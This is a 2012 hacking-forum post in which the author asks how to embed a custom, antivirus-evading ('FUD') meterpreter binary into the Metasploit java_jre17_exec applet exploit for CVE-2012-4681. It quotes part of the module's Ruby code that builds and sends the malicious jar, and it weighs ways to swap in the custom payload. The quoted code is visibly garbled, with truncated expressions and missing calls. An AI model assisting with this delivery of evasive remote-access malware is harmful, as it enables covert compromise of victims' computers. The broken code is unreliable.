Hacking and Security / java_jre17_exec custom applet
« on: September 21, 2012, 07:36:51 pm »

I'm trying to use java_jre17_exec with an applet having my custom exe meterpreter payload.
I've generated a FUD meterpreter binary and I want to embed it into a jar so I could use it with java_jre17_exec.

Here's the exploit:
Code: [Select]

The interesting lines are:
Code: [Select]
p = regenerate_payload(cli)
                jar  = p.encoded_jar
                paths.each do |path|
                        1.upto(path.length - 1) do |idx|
                                full = path[0,idx].join("/") + "/"
                                if !({|e|}.include?(full))
                                        jar.add_file(full, '')
                        fd = Msf::Config.install_root, "data", "exploits", "CVE-2012-4681", path ), "rb")
                        data =
                        jar.add_file(path.join("/"), data)
                        #jar.each do |num|  --------- tried to see what does the jar array contain, but it doesen't show up in the console. am i doing it wrong?
                              #puts num

                print_status("Sending Applet.jar")
                send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )

                handler( cli )

I think "jar.pack" is the final result.

So I have the following options:
1)Have the "p" variable on the first line carry my custom binary, but I don't know which format "regenerate_payload()" accepts;
2)Create my own jar and replace it with "jar.pack".
3)Use "custom/generic" to supply the custom binary's shellcode, but unfortunately it doesen't support it. Why?

Do you have some ideas?


